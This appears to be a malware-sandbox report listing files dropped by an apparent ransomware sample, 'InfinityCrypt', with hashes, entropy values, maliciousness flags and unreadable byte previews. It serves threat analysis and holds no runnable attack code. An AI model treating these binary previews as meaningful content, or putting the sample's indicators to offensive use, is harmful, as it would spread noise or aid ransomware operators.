                                                                                                                                                    SSDEEP:768:Mz5E48v8rS6JR7JFrkrHURdmxmdPFqCoKDw4q/ke:T5QrkIRdhFqRK+p
                                                                                                                                                    MD5:7754C5756DBD5DB105520A2930912FF8
                                                                                                                                                    SHA1:C131D227C7D9FF2C6C1C6736CD1E9FCB4E736858
                                                                                                                                                    SHA-256:5886E9E1C5382C020B85F67FD39CEC3EABE55B069BBE0F9FC5F87918D6BBE726
                                                                                                                                                    SHA-512:2BB251933E9B8D1CA40737F9CDB45F28214221AB19AE6D2B6553DCCB188E1FA624A8989FC1BB801AECED6EA1ADDAFD1536C42F1E0ECE93E3F7BA0416433ED2A6
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:|.....,..I.T.j5?...>J..S.C.h.64.......;..zIL.o^.....I...6..>c...S......B.C.G..?n.u.i@...R" N.n..p#.1.\..|...X..3..Cz..[P:f.t]c*5...]h'..V........1'X....v..p.L.a...1Nm+...u........W......r@,.|.t@H.^.H$!%!4.....:V.....r.X.......92......,....._.(.......So..b$.......T%O.vQ..8..!.S..vR....b5.6r1G.;...F..tE....w.....dDhs.....8\5g...... .P...4j.\6,RY.a6.ial..........xr..i..1DA.....Sn..6Z...i....9....{..y.j..."x.H...&.0m.R........5;...!.....v5....v...:.-?..e.>mu......N.......k2....y.r...1.Y...8.&EWb..U5.M...k..TI$......2O.Ga..v CG.4.r..c5~....%..?...r....j"..f.$c.;..e.}i.....U..#>........@.B.U.\..6<.../..:.]..pG...W mn.JvMl.I..O.v....E.....c........l..$.............W.%.23.......6.Y<.R[...G...M.......I.G....V..T...u..Bx......-.R.A..5Cs.\.[..9........g.;........f..h.(.-.k..H....}3...%..p.9...LP.`........k.<..SjY.6....`.{....w........g>..y..{.?g...S..@.g].#P.x....k......4........7.'........C.\....%.3...\..T.5..U..O....a.TP.0.......w....5..gv...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):832
                                                                                                                                                    Entropy (8bit):7.798115908686554
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:QJafjjbhV1EdV1gEvcSJri/WsYEfcrkWd4JZl+8Wkl5gKK4WbkfYB51n:GaTSdV1pJWuXEo/dsZY8hl51JGr
                                                                                                                                                    MD5:4CAA1C1F05511307606605C170AF1385
                                                                                                                                                    SHA1:4A9B8F30455E0DDCD0DE535422B5ED92CD205278
                                                                                                                                                    SHA-256:FD9626DFBAFECA3789650858AB020F1173BF063D9B1B1A05888687838CB6B609
                                                                                                                                                    SHA-512:E98C0DF7B899B82CF69E60CF43E77E4A15CDEA367E698F72AE6CC368862F6573202F9FB05EE4E5AA7F16A4CE43C423605119EAEC2B5E9AF9EB0DD57466EA3FA5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.(.V........)Rt<.%....{.......6f^..|....{v..... w..+&...P.S...D.s\a...;.oHK#.<..e .au...8..s.Wk.h.`...6..2`o.,k.i..J[.5?..........d!_xzp...R..}....,..~!{...>....].\..q)....l...}.S......6.;N_..W..>th2.N.q..9..P'.^.y2Mk}f~j.V.$q.V._FbYN-..aK...H......Q.1..[97.N?....O..r.!.k..6o.-=m=...D..-._..M...eY?......M.....6..9.$J....{`@.<..Y.Vd'.g.Q..+>,.@=.....Z..8.e{\w..?.!@..Hg...._.7...a^02x..4....,...J...a...KE.A..lzv.....=..H.$.E..3.Hi..2 .....U.V.....A`...8\..}.zW.....r.a..q.b..*.. .wO.y..h5.T..W,.m&..U.,f...K..G/.%..T...3...nd.IV......_nM.VId...;+...A.CW....F.g....R....w.....97.p.)..Lk..gt..6..rqd.....`...Xj^<i...B..+...I.<4........r..M.a3*.z.o.....'b`B]]....P......S...w.....'..yE..|..#.@.....:bZ..{......O.e.1i2...r..RZFJ..r.A.4C....N. 7.-..2.t.,Hm.......>.[#P.+._.Y..r...).
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):240
                                                                                                                                                    Entropy (8bit):7.1524795538336985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:iVgtbcB7/MkwllBahG5wpfJ7U9czY/1v2YoEIuvaSa1:2gtOgkwLBvuPUCEN2YoEI2aSa1
                                                                                                                                                    MD5:84CF1A99B8DD3BD79BF2611CCEE3BDE3
                                                                                                                                                    SHA1:6AAB99D3CFAAF282943198C97A1FFA22DFD67228
                                                                                                                                                    SHA-256:F26734FA1E8C8814D117D2BCEF00C890DF66EF5D72AE719EDBD56293FAA1702D
                                                                                                                                                    SHA-512:B03161AB12613F8C5C9CA3AD2F4030D8AFC2A3F226681E602BDE6C04354DF8818D6CB301BA0ABDDA7EA3C87F600F6191DFC0A338A7878D4A4D4C60CC04C004F1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:\...o.Q.Q.:....R^.."vY=.7...{.o....._....J6.O...V}...r.'g.....$..........v..c\.:..!...>...q.x.s.^nL6.~]....W......Its...Zr..l.{...k.[.D......d..J..8.....e!.N.S..d......m.....N..<.<.$.|.#..t\.....>.$......$...MYa.[%...i@o.3
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):624
                                                                                                                                                    Entropy (8bit):7.6497386546407045
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:ywdW1IS/gC/9mRQiadbEgAm2dbMZhnqNFDHzBeSN9E9lp07:ywdo7ICVmCiadbD0MiN5jNClpC
                                                                                                                                                    MD5:607E9E1AE0473D2A96EF02791A93D3FD
                                                                                                                                                    SHA1:8C1D8FB9823E90E80443D966033BD685C61D53E9
                                                                                                                                                    SHA-256:0D8710BDD56C6E6CC6C0CFD41036E995C02BE4FCCD059277527101001025B9AF
                                                                                                                                                    SHA-512:B7313422C84668926FF95090F2553FDCBDCBF8B7026ED39F5A2E30CDC2203FAE00E919C124384E9E5BCFA9767561DC714FE4138953A1DC19DDD8B0AADFCAD52D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.....!.!..Vmp./....\..%a._h.D.!p...x.'0j.D.*.yP,r...(Y.5..g..]....P&hgm..7.S..Id..h.E...%...n.%')i..TG.H..m.<..+...W.8..0..]<........*..'..%...e....G....&eB.I/.....;....XY...#T.d.}..t.K.8.lX.F...'...@nE61.....|........<....a,.F.;F...e...V......[w......\...a.vr.=.Z.Z..@/w.8.......{!y.O..&2C?..5K|...6SL..;>*KFcy`hF...V.cXWp.T*...:.T.....+....$......9.4.L&.....w.....c...L....j.......t.>..m'.[N;.%....n..q~..+@=F.M...D..I....B.......xuGz..F...GB..(.M@..Wz..~t.k........W.+j..K._......v....le.t.u.(V]...4..:.O[...y_>8....:....t7.v..4(.59.J..xb/../.....t.......-..G./...u...@.....e^.....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):848
                                                                                                                                                    Entropy (8bit):7.734865849935326
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:ETAWX1rhi2G2Gw7KuOyNxekt0VWOB64xh4tSimn:ETBa7ty2kx4bhim
                                                                                                                                                    MD5:94A214B2A854BBB8F15298867433CA0C
                                                                                                                                                    SHA1:A63D3A0F8B915B7865A20D2A884460A53B4B43AF
                                                                                                                                                    SHA-256:670CD76235165CA6F17A32836781878965E92252C37865237AE35DE1AEEBF75D
                                                                                                                                                    SHA-512:D7869FAE7C6EEBC2B15E8B4598B0F4EA9EA17F39CB36835A78525A31057FF186556DA86A489C2D135C6E88871687793687998763F1D47EEF47BDA0037C2E89F2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...O...f.2>.>J.\.{L.."V.....i...=."9....*=....G.........Z.co...0R.0..j..8.3.>.H....b...../.....}..$.~t.d[^I.3z..U.3...a..y;.K......pt....#j^o.....c..P..v..k..r.}.Bz.t(..esi.Q....'&..........2.lf..,.>.5.S..E....f...Z.n...%h.......w....|....D...]&...T..:[~...../.K(......*.....k..>....T?@..I..M..[=..:.A....P..>...vb..s.(..n.#...).B....5..e....Q............u..........C.2.."|O_ .N......=.'.."]C)`.h...Q.+.XN.%"h..K.Y...;yz.+..N....'W.A.tk.h......DH%t8....+...{.vM..P.i....n.6..*.....c......K......b2n.......^.q..1..=..O.... ..=.O*[..q......".6....AE.....y?...>..Q./:.~%..:.'...C.H@K.....M....R..}..*..[.......$N...-..j85..................M..M.......y.F..K~!....)....X.q.u..I.'..x..)5...........F....X..8Au?y.%.won..6...#.O. iu....o....D'Ke.+$y...2.N(..t.(,&.6....\.......t...Oi..........).h....X.....T..@;E
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):15794688
                                                                                                                                                    Entropy (8bit):7.99998935964688
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:196608:/NCpp1VFqbHOOnnnGEiP33yYFf/fISG9zL02PqGX9c6qnIc4UH0QYVneLDOyYsOe:/o5ouSGTf/gfPqGZm4JLeLDMhCrGK
                                                                                                                                                    MD5:376EF89AAD6F91D0455D74BD164F3658
                                                                                                                                                    SHA1:BC032290DE28444067678946B7BC9CC8A531ECF2
                                                                                                                                                    SHA-256:A5C5CFEB4A4195F24CC26A138EA38B8DA83B6429E955BBE491D83F8C886DB4D2
                                                                                                                                                    SHA-512:BA7EE9844103D1B0F4256962614F191CD84FA1D0245978E531543B2F02836DCD1A34B195759C72C712ACC8F5AF1FFA61E3C4204E3742F3983300C0752435C78B
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:P......p.W......_*.. .`.o.........h.......{|/.`....DM..n..K.d....`WX.Cg.<=..E.i\@(....|....S......U.....s..."..?..,2..n.Z..*..._G....).^.8.....;.%..-..)...IO..y......|.oCr.....Bn.5Y..).V.0...b...v..c.3......F..L08.1k..i..W.1....=....%.../..*9L.:. .0..&.".(...h{....|....C...t.7/.fwq....KY.xU7...<l..1...b......KN........f.-..m..[...i+.L..W[.I....k.E.H..}...O.....K...ej5.2.....wx.V?M...|"Q...O Q....4"...:8(T..(O..:\.WS.~?...AY...Jl.......>...9....l'Mu6...a...{.......8..f4KO~..V....:5!..Y^u...Ff........Q..i.....L....S...*n.^...<..Y.....6..g.4........N.@..*.[+..C.....{....;.sag.n.J-L..]J.Q.<....#-......>...h;4..v...,......._.>.....:.N...[.M..'.......l.A..D.(..m0....V........qG....+.M.U....BQ...gIS.Uo6YghK..w.>D%-o9.......n=6GD...[,dz...p..bQ.X.Bz.3.D.....^.).-F..< a....../....|...8vy........ |..[.D..$...!)<.(...?b.......f.5?..;./......mr....]..KI.]%....h...;...':2#w..n..\....<...d0.2`.K..'a..L.....A........7..=...{!.IH."_....d*+C..\.Z
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14048
                                                                                                                                                    Entropy (8bit):7.986710451065214
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:eyRAtdjO/LOlPs8eXb3P9fJkSvQZ/nQeWzocX9TTDUpF:eb/j+AstzVhk1nE9ToF
                                                                                                                                                    MD5:E0F7FBA2E2EADC56339F68EB7527BE2C
                                                                                                                                                    SHA1:5A5113FF20B0DADBE9F8CBAC35455D0F229FF07E
                                                                                                                                                    SHA-256:F144BC1DDD9C5E9BA7F6B326C7E197078B36904C2BE07F475FA2638FBBE37A71
                                                                                                                                                    SHA-512:9F721EDED184053F378AC8F0097B5B8AA438B1ED2635A52D5EEF450BD02701EFDC49B286CFB64D331FD6F0D7B1DC57045F6B339B1A980AB164A9BEFA35701551
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..!".1..;.2....W`...;....Om#.......r.."\.%T.u........<.......>/.....O.M.=.SRE..c.y.~.jS.:X._P.p..........\.._<[.4m..@d........R(.||..%T...^g@..s.5....@..h..q.....r/.1o.3..R.}.g>!&^.1.wM4....B...Y...p..<....M]...dOK.q...^....Y"7H...4............#.Y<.-..FYR7|K?...j.k.._?.......9..E..;.S.)JS8tsp...h..u.K8p..6....J...S...7h.+.en.L9:..W.r@...=8b~6V5.Q>....$h.V...s..v..b..3-Jt..X..t....T...+.....}.Y..Y...1.;m..w.e.BC..s.".~6....wD.ht.y7cj../Ub@.6.?......][_.V@..b.} ]X...C@..,..+.y._.T_.'..D.....z..a@.E.md..'7SDz..%..W....O%..JC.A..$.@.....Y.@e.....M...(N.[5IHZ.W>[#ht:..u....Z..v....-{.W....@......b.Q...p....\F....`...>3...x.....m.51."..)=.......+>.$..7.m..M.....%...2........v...%....e.........D..O....u.4!......hm*..........#.qSU"......)...l4.L#..|S.eY.D....|..>.......G+-...8u?>...E.w.b3..y..u..5.:.5.F.*4..K..i....B.sW.lX...{...@...w.p.cr...OIO=.87.6%...+%..?...7.o-.....^z%.8t..x{u^.....0...;.mX...KR.zh...F..=.97.!.......... NTk.H...V...|.g...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1856
                                                                                                                                                    Entropy (8bit):7.886193664274439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:6GOavNIH6znNRa85z4plL/7Yo8vlCwpTjPthnFyAtpqtAtH:VOavNIyNRd5zwlL/koCfTjP7nFRYtA5
                                                                                                                                                    MD5:A158F124559A37F14D6FF6B0FA401B01
                                                                                                                                                    SHA1:7D673A5B13BFA864AC0749AE2338AE66A6588213
                                                                                                                                                    SHA-256:25D16A0C1F3769580094EB9A6D759A05E788B7E55F3163876F9D4F482B07EB87
                                                                                                                                                    SHA-512:E63EE1ACD99193CC1E61EBA73105A8864359F580113915675A1B36B3297E28337DB921D9485EBEDF894632C51912448FD1DB726A6595EA03B26795EF1970F9BA
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...HB{6|.=kP.k.<.q....o..{.z...0.QckU.z$<.[....[.....a]. .3..RA..J3.E...c../..A..........z...+a.....z...7..IUq/..b.Y'{.R.-....}8...&.<16..8.;..0..B.9.(.....%..%.5.e.......y@w.....G.pQ5?<_vU...... ...z"..^ZP...8.]CDy..M>....<..K^5..6.r..:&..z%...0...........Z.WE.!.Ud.E..J....}..S.z..s..?....~...9B... eWa!.w..~....q:....O...ww.?".....^.......m...R.N....co....0..}[..'.o.U6|&.C..+yIk.._[.k..9.x.......BdGQ....s.p..".L....!.5.b..\.SB.U....A2hQ}.....&.K..3;.V....<.[....mdyu.:.W...8...... >z...o.....Q..........."Z..o.|J...,.2r..........8...B/.x.<@..xY.>.;'.a.U....P..9.0....t.eKN...S..}0......!..9.W............G.O..n.....~.E4.......Yx.X[.....f{.>Eh..SC...rm...qU\.k.<....o.&X....K.w...x.DI.vT.........9...4...%.R}!V........;.-=).S...UO....aU....b...`...@..;.;.H...c2=.M..)......5.;.SFCKG...x=....j..b.O.[.c...........50........i.(..L......^=..T0..M....%;...QL.....A.....9wdz.~.J..$....U..c9....%...T2n...'m]t/.q+..P.Ym...N.....I.....O.T.hQju..9.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1920
                                                                                                                                                    Entropy (8bit):7.897315891678701
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:Jb+rq7abIMFoqBj/euIPfVO5YcULgEqKBPkR:NdabyqBjQPN6SgEqKBPS
                                                                                                                                                    MD5:4227CB8BFEBAE9AD3AF6869D62F363F5
                                                                                                                                                    SHA1:B420CCB6F7DE5C6BCACA9EA327DB6A83EC1BA7A8
                                                                                                                                                    SHA-256:52AA293179F0759B0A0B930388A9D8B5C137EC5F88EC758C653CA2100FBDB2F6
                                                                                                                                                    SHA-512:099B3E5BCE5BF27EA6ADA5EF96BA02405166CBAA54550A753ED8992AED127FC16D68294E057385F3C306CA2BB0FD525C058ACAD51FA4B6849FD936279185CB6D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.7U.tf"....w.-D.%Ipf.|..T..C`...U..E....Ob......a..........}U.\(..E.\.a.0..-..j...-L.....PwF..u.Htm[-M.(..6...A,..E..Q.,R.w.bN.!}h....D..o.....`.[...D..lH....8..s..T$......4.>7...~z.n..:d.4m2.g%....l.e8jP.... e....QZ..H.....w+.........".k..~.g....uM.dBo...D.x..-..~.L.+)h....m......4..$...Uo..P^.P..UY..C...#......p.G!E7..Y.....}!...ii..,.3.,.....s.....gw.i.m..../).ZFZF7.hLFT.........;.....U/...m.0.....S.[.......f....n..@R......Q{@.. ..y(@E.....}....Uv..X.V....z...2...x.8m ..=.X...X.L3...C.tDG.2e......M...MJ.b.n.......Uy.-...Z.R.s.x3.i......u'(.(......Q;..E...0^...lz..+......V.Bh..t.I.c...N.{.+.....Qcb..lmH.A(`q...?.'.p...3.FT.P...O..X.X.,,..K.....@xW...y.|..<..E.Z........Mb}[`.O.8W.B.}..6.<.g......*....I....}......>...Fh..S.3..L..dlt....v%....GJ?%.;I`.9....C.!...//+.Y.>..]......!l.?....S...a.!..<.Z...{?Da/[y...ux..4...n......;.....&.........;:.|W.....I`.....7N{.a.o"j(...%...{.......@..V.AE..Cg...0gJ?.b..9.lP.:5e...;v.)T.....f...8..gbm{.....K_..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):761296
                                                                                                                                                    Entropy (8bit):7.9997467090650245
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:12288:LnV8C6JowWryrPZbbc/84j13B8BSyKLXgoPKrzz/ipdU8HO3cN6fv/pe8K5841WF:LhwWr0bbch3GgXgoPKrzz/iI8gkbIjPL
                                                                                                                                                    MD5:76AACB71669754EBDCD6D65CB2B27077
                                                                                                                                                    SHA1:3928B9EFD37982A29EE535CE851A31E9BCD3B5A1
                                                                                                                                                    SHA-256:9DE35B8D7FBFC2B1FB6FF005B171E77FFAE7F609B26D133EB0D09165D48517E9
                                                                                                                                                    SHA-512:B664875C39506386E9D6DEA5964B4D3691414CC975E2999437EE616051F30D431C1A1B4B86518548C03672B57F17552DCF4EE0B98F9EB09F7D215F0E7CA65A67
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:....;~`.Q=#.j.Af.Y.R.L.0i.i......d....I<..X.%.^..JL..o..`..5.J......}...'^...$z.(...x.(.:[v(.ty.f.1.z.V7q=U..y.z.1S.n)...9&s.2..!....-....a.K[..Ip.6.4qe../..!..x.473B.K.y.%..m.s&.q...c.8L..s.}..N|./..........5(..J..`..X.../..f.6D.6ln6.1.?.ORw.o+2C...D#E...IE%...-...a.]*.....2...KR..=j>..%~%..cf..g.}=......h${P..#..J....9h...{...<...4.!.N,K.~..M....yjAMMa(d.....NP`b ..fpQ\A.....9Y..xrE>z.y...|.....z.2%;r.q..B..t.#.3Vb.....z5l......_c..../.Lp.H.O{........*}.......Sr..R..D.\.i.%.C..Z.hZ.y..qL.(|T.......@&...x.....eR..KfPK.|..$.d..3.#...<QXt...R.A}.-..N.z..J...-...-.tF....>8.I.!?..\...h.P.r5j.C......L.R..HJ.O...K2>..}...W...m....%.q....).'..:q.%y..`T.?..e.{;........r.xr...sV..^'../.sI.n..>....P....'..A.%..w%...........K.g..nKy.E.Mg.X.).s!....5...$......b....=.nM...%..?0D....n.s.....*.Y.Z......Q.....O.....u.... ...u.....A%j\i...w;E*....`i.Q>h..0.>&..O.,B.|.g..............P......:...m-.. .U.$=?......<o.GR.%......n4.....Dz...:.m5rVWm...y.@......%
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):279936
                                                                                                                                                    Entropy (8bit):7.9994074079207405
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:6144:kqSJwI6kxi6U2zvqOIrMI1UtRnf+7owzufvchcsqijcmGLsOoH:kJJwfCi6UEvuMtX+hi0hcsqJS
                                                                                                                                                    MD5:B33DAEA4093139A239C9EC4F9AF447B9
                                                                                                                                                    SHA1:FE6FE75A15D7EBA567CF8FC848928A567465F110
                                                                                                                                                    SHA-256:3388DF05EB1C1425C5B75EF30F5590055F688BAA25F5F01B1564A8FECB6248A5
                                                                                                                                                    SHA-512:576ED79255783362BF15BA89D6CC625AAABF9BBE01E7AB23929BE739FDB5D9BC57005D8C2DAC96B07C5505E1BB764C7E65AA1F132CBCB9988E537F90BA09F320
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:5.8...e..G[C..#.3.XSa}.....}x.7...e{.h.Y.(.A...."..!.+..m...V.h/..F..>v.....T.&n..3..qP>..G.`...;.I."?.lX....(..N...u.{..T.....R.{.M.q.@.o...../....]....Uc.p.3..SV.f.L.$....=.h|.....J.....Q`'..uYA..D....*..%Li......Y.`........&"@E6.t#]9.....MX...N(PL.pd..z|...z.....2..gi..|..qn........l..{LH8.1Q..!@.u......0....d...bx.T.L*.g:,.,......nm..(..].N.......E.n...jnRM..Y.o:.O......G..~....&U.<..p.e.<.@.v......^..R....Z8Q..........;..fw.........@..-0.5.....!....1QeJ..O....]..E&U?..+......&...C..{...).z...lK..W<j.t...,0.8D..Z.(ru......"..`.....}...k..5..f.c...u...........r\..z.u.S....n<./..g+m.`JW.....O.t..j...@....~..6...n.........s......g.\$....Y&..7J*_.a.).....YS...N.9...........o.....8.Z.G....=......*}.=A.X....7....<dt..(.>..j...gA..2...v......>....$hz.?.v....Q......}...w?.|.%.aV....T.nV,..z.....Ab.X:...J..j.%6....~|..}..gRc..EcB....g.nL].JY..\-..D1.s..`wR.g...F2T.5U.....[L....\J.MJ.......:....R..il.......nR....{.......)!...6./{......7
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5376
                                                                                                                                                    Entropy (8bit):7.969161094604211
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:+sqnTgoMb6EQmQmHOaSagIhtTOoPpBz0W9ABQWHDD/VZJ6PU5GMRH:+bT+bwmQjig5ohBXNWHDZH6PU5GMN
                                                                                                                                                    MD5:2B8AF76A9A26361AC087E02AA19743B1
                                                                                                                                                    SHA1:A9168ACE4FF2A077706D47E0E3A268AFBA14FC73
                                                                                                                                                    SHA-256:513C5F9917C3571E7D02DBFC025B478D272F785897479A31E33496D2040A7416
                                                                                                                                                    SHA-512:F8DD5FB31432142B839F50BE8B82555F0619F017A21C2613527C6158503100327693E2540563CC79886B2B8957B9C8A73A4B4539AD09D61D22C34DE029745641
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.C.:.e!B.,... ..J..)).......@..w...\..W.b....O.....!...tr.v.-...]Q].NI.W.S9..i.+*......o.1..>A....Q.. *..V....S...1....j^s...\"..../.W.......Q..7!oQ~.5=\..{......M.kK..... b...C+...x: ......!.*17.....L ..T.U....6u)}..TX.J...[.*].......e..z.%..l!...S;..Q.......M.7..i.r.?...,.:M..vc.}...W..-.S......'.:F.w..to..Y.T+.k..).9.....hC...[....r.DT.J...l.7g..3I..5.C.7y..l..%2.q..Z..2w.(?..-...ep........q/I+'.W..<.D..N..}3.......2Vl.}.....F........t.1.}.e...F^.q.[..B(-......~H..V_........8../.+8 O..V.lW..>{.FIC......q.A...,..I"y~\........g..}.M;.a{7..=.I.D.#.m..1.E...O9.;..@.k.....h.....q~...v..<...>.!....Hvn...yJ..N..pB....o.`..".PP..q..b..1......\..n....iX.o...........Y...-.yr..0.#......:...m.5.6..2.%/I.H.5.FR.....i&.s?...Z..T.}i,G.~..T...y*l..]s.l.U.\K.Q.g.....=su`.R.7I|A..Y.>#.C....p......)..Z.m.p.....kgw.[3.TQ=..6H..P.ikrh..7..<A....i5.V....S....,.....n.i....:.o..&..N..3f..e...,..w.Y3..Rn...pSI...^s....:L2..W.UY.#.4....<..P$....J.s.3T2.q..i.nR:.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3088
                                                                                                                                                    Entropy (8bit):7.944337181482503
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:tQbDIdQ0/7neWVRt7Bsqsew2SBSESW9dhT+fsztAtdld59hG64rZAimoLxuhs79l:tQUzznpVRcpAjm8eWtdl9htWZbFieIxo
                                                                                                                                                    MD5:D62CD5F2437B7321CB03E4652593D64C
                                                                                                                                                    SHA1:77BEBBC7EEDA7041E0B96C6EB113CF47E112141E
                                                                                                                                                    SHA-256:96E8012AB8CD2674DF8C8F7AC99C8A1A0F3D7C4DE0D3ABD474B664F1CDE7406F
                                                                                                                                                    SHA-512:8A66168D51CE11C7389EA7219C968C5022CE2D28108B4FAB37866BC52605ECE6389D365F99DBC2C3FA04C6481AC6C6A17D95220240833BC4A6B09A29B8DF2FA4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.c..z[:[...*o2f......=X...A0...\..... dU.O=-'.j.f..04<.....5...:{..4..[3Z....\..E5.....o.o.dH<MUh$.....,..d.....p.K..be._..Y.. A..u..S.....g9..6.>u6...........^..E.....n....5...B54S+?<.z'.C....1.:..M...,J..X...?.em...QK{S`....x....H.<$o\.81D..Z$.C.".....j...............3......J...f..2.`......P..EW..+?.Q.,gX.*7.-E......9..y-.<.ymn)]....G.9./..n...y*......}bQI.Z.Y.d.k.g...{G5...fs!...b....d..*M.......~.4...Ni...%....c....!*n.8[(;..E.G..g....5.../....w.S.Z+[...jg..]...#?....).`..s..p......E..(EVG.u...Ts......Y.A....K]...1...v.........l.2...W.eY=.~...+y3*..'.L.....).........._..?.].D....s8S...m...r.....]*GY...(`.B.$r..n..\.*]!8.V`(.G.z.k....N..R....b.....D+&....}>L..'..T.vDx.B......o....^x.mUp.1..I`Gi..=.m...,w1.+....jX..3q..1.....d?X`,/..(.@n.0[...N\(Rf|ya....q.z....k....)@63.'..&/......(......".*.l.......j:.Z.....64..Y.....(....*. .(+.....-.)u.......I.....h..,.UN..{n a...._.=..t.~...z.)E..]B.B......B.>..........jU.p...lm6!N).
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):77904
                                                                                                                                                    Entropy (8bit):7.997665052290288
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:1536:5AHXEEv+eZ8xZU9X5WVUOCNXYjtGNqvEIQR+Qm9BFVnN471NXV:WHUE2wC+5yUd9YjMNqvKJ8hNMXV
                                                                                                                                                    MD5:C3B88533B46B3912E81425811CCAED67
                                                                                                                                                    SHA1:C4F52549E30EC84AF064752CFA3E24309ECDFE57
                                                                                                                                                    SHA-256:C523DB2467439F110B3E7294662CD564D46290F466CA58F3E0E83D6EFA2EF3CA
                                                                                                                                                    SHA-512:16283ED4B1A64D5E03CC48324E4D020FAF20FC19C57FF20D57688886BC2C41AE07FD3E3EC7BA48E4DDD18AB9E33B9E1C4BBA3DC9CA8B89BE1DE802D80B909925
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...S...UY.h....+M.u...m.k.G..6.F.T..Y.p..B..$..3T..f.[.f.../...s..}.4._f.n'Mdv..9(..be.uk.^.-....=.i\....L..n.q..G.0Eh.S......\...DD\&.O.....|.\.Y.:...............L...[u.f...7..R.a.3K!B.89.`.*.^~..?...Z.iQ>..r.^..T...*..}9#_S...M.j.r.+;p......o...(.W.........i...{.i|._...P.K^.........`....^.k;H$p....avkV.#.2[...G............:e....~..V..c..##Im4.36.._...^.,~O..J..P..O.;.A>ZR.NXgP.O....wZ.).....g...DX..H=_&...,....e.I......Q/......&.a-..Vd...c.[.T..c...l......3.T..;#...*.............J.......A.......I0...-s.q...K....s.&80d.. hN....4..Yw.p...Y......Xq`...X..H{..4......X.3I!.......X.5....`.0U=.1..?D[C.. T..g.0m.&..Th......Z.s!.C..ty5.....S..%.` 4vicA..j.mH.W>.Vq.Sh.2.'..v.#.5......N6)n_H...@... .W../.........+/...G... ..k.f...........ZeO.../)q..#1p|tt....h.G....3L.p!..5....K.Jm|CR.a..$sVP..1.......T.X.$HM.K.U9...pejb<.....<..$.$.l..%..h...)...GZ...s.R.-..B..S.J.{..l..N.....).c..>.*6....+..j?.%-..8......V.x@.GP.~..Aj..s.3n..*..7X
